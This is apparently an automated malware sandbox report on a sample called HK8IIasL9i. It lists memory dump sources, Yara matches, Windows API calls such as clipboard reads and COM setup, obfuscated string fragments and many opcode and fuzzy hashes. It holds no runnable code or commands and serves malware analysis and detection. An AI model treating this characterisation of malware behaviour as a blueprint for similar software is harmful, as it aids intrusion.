                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: ED9294B5905229CBDB24CF59DC887EEBBB1FB85304F2082E9D4596B350DB744A86CF84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$9YB$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$o#M%$pIrK
                                                                                                                                                                                                                                                        • API String ID: 0-1893782281
                                                                                                                                                                                                                                                        • Opcode ID: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                                                                                                                                                                        • Instruction ID: 781679972a6841e1c847c4f60efe13a356bbdcba151b8db67255a8fcfea8ccb6
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 352bc6129ea404ee1fcf6995b34e1b15834a7e93a19395cb87ac8d1b474b4daa
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8E92A6B5905229CBDB24CF59D8887EEBB71FB85304F2082EDD4596B350DB744A86CF84
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #f!x$%y$)Z*\$)Z/\$-^+P$5F6X$6T$7$8JL$:JL$<[5]$=_%A$>N@$?z=|$A/6Q$VaUc$hi$o#M%$pIrK
                                                                                                                                                                                                                                                        • API String ID: 0-2118368390
                                                                                                                                                                                                                                                        • Opcode ID: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
                                                                                                                                                                                                                                                        • Instruction ID: de3520e2196d7f16f07d2ed474497cbb7c0ad1bcb3588638f17d59b7a347a8b0
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6369199cb7596cff2474a1e92261283ffba6f3554d101fd91b4a7e503897d434
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3232FCB48463698ADBA5CF5599883CDBB70FB51304F2082D8C46D3B264DBB50BC6CF85
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • CoCreateInstance.COMBASE(0044168C,00000000,00000001,0044167C,00000000), ref: 0076829B
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0076832A
                                                                                                                                                                                                                                                        • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00768368
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 007683E5
                                                                                                                                                                                                                                                        • SysAllocString.OLEAUT32()\"^), ref: 0076849F
                                                                                                                                                                                                                                                        • VariantInit.OLEAUT32(C7C6C5CC), ref: 0076850F
                                                                                                                                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 00768660
                                                                                                                                                                                                                                                        • SysFreeString.OLEAUT32(00000000), ref: 00768697
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: String$Alloc$Variant$BlanketClearCreateFreeInitInstanceProxy
                                                                                                                                                                                                                                                        • String ID: P%R$)\"^$.H4J$O@$pq
                                                                                                                                                                                                                                                        • API String ID: 2775254435-1397720406
                                                                                                                                                                                                                                                        • Opcode ID: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
                                                                                                                                                                                                                                                        • Instruction ID: ef236122cb2238395e7789a0392efe4c2a91aae8037fc91385731e8a7db1d679
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6b5d4364e48706977140092b86c3d080d2f37fa92fd1966bc9ba7ab4e9bc5c07
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F322EFB2A483508BD314CF24C884B5BBBE5FFC5704F148A2DE9969B281DB79D905CB92
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
                                                                                                                                                                                                                                                        • API String ID: 0-1290103930
                                                                                                                                                                                                                                                        • Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                        • Instruction ID: 9da03d0d7728415739df837e9a5d6b3acde744231e06f1a9769003f2125b84bf
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 50A1D37120C3D18BC316CF6984A076BBFE0AF97304F484A6DE4D55B382D339890ACB56
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: !+2j$"$$01;$(7.A$908#$>7;<$O35 $bblg$gn~b$ne$vm/;$w!w4
                                                                                                                                                                                                                                                        • API String ID: 0-1290103930
                                                                                                                                                                                                                                                        • Opcode ID: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                        • Instruction ID: 27aa406251b7acaabd84928f985f4e30d58d5bd7cdc390510748012931b83fa3
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: e76aa1fc780e58e750d1ae106741ee0e38235b05f912ede24168565961e5c466
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EEA1D37020D3D18BD316CF6984A076BBFE1AF97714F184AACE5D54B382D37A890AC752
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: /G$I$7N1@$A[$Fg)i$OU$WE${\}
                                                                                                                                                                                                                                                        • API String ID: 0-1763234448
                                                                                                                                                                                                                                                        • Opcode ID: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                                                                                                                                                                                                                        • Instruction ID: 056ee81575811c50f3dd50ebd9ce003cf240713406730f881528123b83eb6744
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9a3fdac08369869b3e4b907af5614077a7e06872068b7e02554c3d5f210a0157
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2AF1CAB56083509FD3108F65E88276BBBF2FBD2345F54892DF0858B390D7B88906CB86
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 0u4w$KT$Q$SV$_q$p8`;$qr$xy
                                                                                                                                                                                                                                                        • API String ID: 0-1826372655
                                                                                                                                                                                                                                                        • Opcode ID: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                                                                                                                                                                        • Instruction ID: 8fe2ea29b4499c84cffcf606e05d59b8c59937f8b413fb95e2f4cb334fca5623
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: de28215cb72b44d1e1dae71e7b93e978bf7f5bc1ac385d0b989c0c45dd6a48be
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C92212B690C3109BD304DF59D8816ABB7E2EFD5314F09892DE8C98B351E739C905CB8A
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                          • Part of subcall function 0043C1F0: LdrInitializeThunk.NTDLL(0043E31B,005C003F,0000002C,?,?,00000018,?,00000000,?,?,?,?,00000000,00000000), ref: 0043C21E
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A6BD
                                                                                                                                                                                                                                                        • FreeLibrary.KERNEL32(?), ref: 0041A77B
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FreeLibrary$InitializeThunk
                                                                                                                                                                                                                                                        • String ID: / $/,-$46
                                                                                                                                                                                                                                                        • API String ID: 764372645-479303636
                                                                                                                                                                                                                                                        • Opcode ID: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                                                                                                                                                                        • Instruction ID: fba97bcbe2fd55ed4e85c885b06b17ae8f82464d9f69d288493d133838553020
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: cfab914b501d8a8cf1708b7d993028f7dd60ead683b03e6467ea9e1f6c8d91ba
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EB247766493009FE3208BA5D8847ABBBD2EBC5310F18D42EE9D497311D7789C858B9B
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: FreeLibrary
                                                                                                                                                                                                                                                        • String ID: / $/,-$46
                                                                                                                                                                                                                                                        • API String ID: 3664257935-479303636
                                                                                                                                                                                                                                                        • Opcode ID: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                                                                                                                                                                        • Instruction ID: eb6f137ecbe2ce4dfd70e26d739a4eb9df084e83cd7ee5930c6309e2db6f0543
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 372519780fc120e8f753ff3a14c90593fc4e495d40ae975e42710550ded1acc0
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 09B256B6688340AFE3208F95C88477BBBD2ABD5300F1CC82DE9D59B211D7799C459B93
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 8MNO$<I2K$NDNK$RXA$X$oA&C$~
                                                                                                                                                                                                                                                        • API String ID: 0-3328159043
                                                                                                                                                                                                                                                        • Opcode ID: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                                                                                                                                                                                        • Instruction ID: b39a018424f603aff0b8ca9a117b68807cb953dc34c5f22e55a732b949ac1150
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7d14a55b692df4f7a5a1489c3381dac725c5f5ca9d3437b0e32695eadac0db18
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 90F125B6608740CFC720CF29D8817EBB7E1AFD5314F194A2EE4D997251EB389845CB86
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                        • API String ID: 0-2463461626
                                                                                                                                                                                                                                                        • Opcode ID: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                        • Instruction ID: 1dd51b58cbaf6b0a0f55c15d87e18128fba8370b8dc8b23ccf2a832bc891c079
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 80c25fe3e2dfb50a6448c8159146231cdcc410b8e27bdf8e1fa965ce3e3910ee
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D1497665C3548BD324CF2488516ABBBE2EBC1304F1D897EE4D69B381D638C916CB87
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: 1]_$:;$}JsE$}JsE$AC$E)G$Q?S
                                                                                                                                                                                                                                                        • API String ID: 0-2463461626
                                                                                                                                                                                                                                                        • Opcode ID: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                        • Instruction ID: fd1756fe1aae61b4aca309ddb76119725af3889cb1ed020667d70c6525be08ef
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 682ddf53b01bc525795b072e2938ffae95751b7f3a8718d374d2731849975a8c
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7CD1397265C7549BD324CF24C8526ABBBE2EBC1304F1D896DE4D58B386D639C906CB83
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: Clipboard$Global$CloseDataLockOpenUnlock
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 1006321803-0
                                                                                                                                                                                                                                                        • Opcode ID: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                        • Instruction ID: f2decc6a1db23371b8bb2cc1877cdad688787675f84f74fde2292b1bd35bf902
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 62f3a4270cdee086724bceffc210ad3ff0b6d52f738edb6c1f0dd5dd3d126aa6
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 855102F1D08A828FD700AF78C54936EFFA0AB15310F04863ED89597392D3BCA9598797
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                        • API String ID: 0-2309992716
                                                                                                                                                                                                                                                        • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                        • Instruction ID: 26eceaee55227743b306782b87e7b3b011f3ad886b5b359efa5fd428808e0ec2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F661F37164D3C68AD3118F3988A076BFFE09FA3310F18497EE4D05B382D7798A09975A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: ($jqci$wkw6$x|j~$ye{|$z/6q$|$Nb
                                                                                                                                                                                                                                                        • API String ID: 0-2309992716
                                                                                                                                                                                                                                                        • Opcode ID: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                        • Instruction ID: f21cbf07b5fb6c9c506112b4232b545a4245f283b5556d75b955b3e1d66eb6c8
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: fd7fa187f6c051c069b61ec8393945a68ebd5901bcbcecc092057dec6910dd98
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E6127A164D3C68AE3118F3988A076AFFE09FA3310F18496DE5D14B392D379CA0DD716
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: #4<7$+8=>$PK$Tiec$\$r
                                                                                                                                                                                                                                                        • API String ID: 0-1906979145
                                                                                                                                                                                                                                                        • Opcode ID: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                                                                                                                                                                        • Instruction ID: 6053270823643479f5a9008bd7dab94ee1cb24749ea6a1c2bb59c6b2eb0b3cac
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8a87d060594a504fb9fb2c8fb36e58836b617313b2e0b34c62a439b04e6c237f
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 29D12476A087409BD318CF35C85166BBBE2EBD1318F18893DE5E69B391D738C905CB46
                                                                                                                                                                                                                                                        APIs
                                                                                                                                                                                                                                                        • GetCurrentProcessId.KERNEL32 ref: 00738B83
                                                                                                                                                                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00738B8C
                                                                                                                                                                                                                                                        • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 00738C42
                                                                                                                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00738C9A
                                                                                                                                                                                                                                                          • Part of subcall function 0073C7B7: CoInitializeEx.COMBASE(00000000,00000002), ref: 0073C7CA
                                                                                                                                                                                                                                                          • Part of subcall function 0073B5F7: FreeLibrary.KERNEL32(00738D1F), ref: 0073B5FD
                                                                                                                                                                                                                                                          • Part of subcall function 0073B5F7: FreeLibrary.KERNEL32 ref: 0073B61E
                                                                                                                                                                                                                                                        • ExitProcess.KERNEL32 ref: 00738D38
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID: CurrentFreeLibraryProcess$ExitFolderForegroundInitializePathSpecialThreadWindow
                                                                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                                                                        • API String ID: 3072701918-0
                                                                                                                                                                                                                                                        • Opcode ID: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                                                                                                                                                                                                        • Instruction ID: 308647a4ad0ef8c94426d7820f489bbdbf073f739de408d25376ecf92803adad
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: a98a3e3c2a5f1b0f673359f816fa1806a79807cb3814a0bc3f2413038ab882b7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC51A8B7F102180BE71CAEB9CC4A79975878BC9710F1E813D6941DF3D2EDB8880142C1
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: )G+I$+K M$B~B$|B$s0u
                                                                                                                                                                                                                                                        • API String ID: 0-2670551875
                                                                                                                                                                                                                                                        • Opcode ID: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                                                                                                                                                                                                                                        • Instruction ID: a4cd9e1bca78e5d66c5ba9b7c65c08060f0057a840f0996e05fe944024406416
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: b0f283475cc496918f7695a9f64fd01b0ee276164c6e466a1bea6c055f4721cd
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6C321175A08350CFD714CF28E85072EBBE2BF8A314F194A7DE89957392D7349805CB9A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: KT$Q$SV$p8`;$xy
                                                                                                                                                                                                                                                        • API String ID: 0-2575762000
                                                                                                                                                                                                                                                        • Opcode ID: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
                                                                                                                                                                                                                                                        • Instruction ID: ecfd4d91e86c567b56f86f4e5e07f1101c977c29d49ab91fcc3dd01370d581e2
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8208a9a5f85f4d31079f5f33de460df7d971af99579cab6366320c8ef0c9cde7
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23910EB6A0C3549FD304DF56C84155FBBE2BFD5300F09896DE8C88B201EA35CA09CB86
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488099909.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                        • Associated: 00000000.00000002.2488099909.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "$-+$/$hI
                                                                                                                                                                                                                                                        • API String ID: 0-2772680581
                                                                                                                                                                                                                                                        • Opcode ID: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                                                                                                                                                                                        • Instruction ID: 80b5f3405da4d7e7bc2228bbbe7299cc3933a4313a4431d55bf3dd64750ae482
                                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 409baa93764c372ff58d36d41dba2cd8c3d99c0b7ed760c369768b2520c3b364
                                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6442387850C3818FC725CF25C8506AFBBE1AF85314F044A6EE8D85B392D739D94ACB5A
                                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                                        • Source File: 00000000.00000002.2488705736.0000000000730000.00000040.00001000.00020000.00000000.sdmp, Offset: 00730000, based on PE: false
                                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                        • Snapshot File: hcaresult_0_2_730000_HK8IIasL9i.jbxd
                                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                                        • String ID: "$-+$/$hI
                                                                                                                                                                                                                                                        • API String ID: 0-2772680581
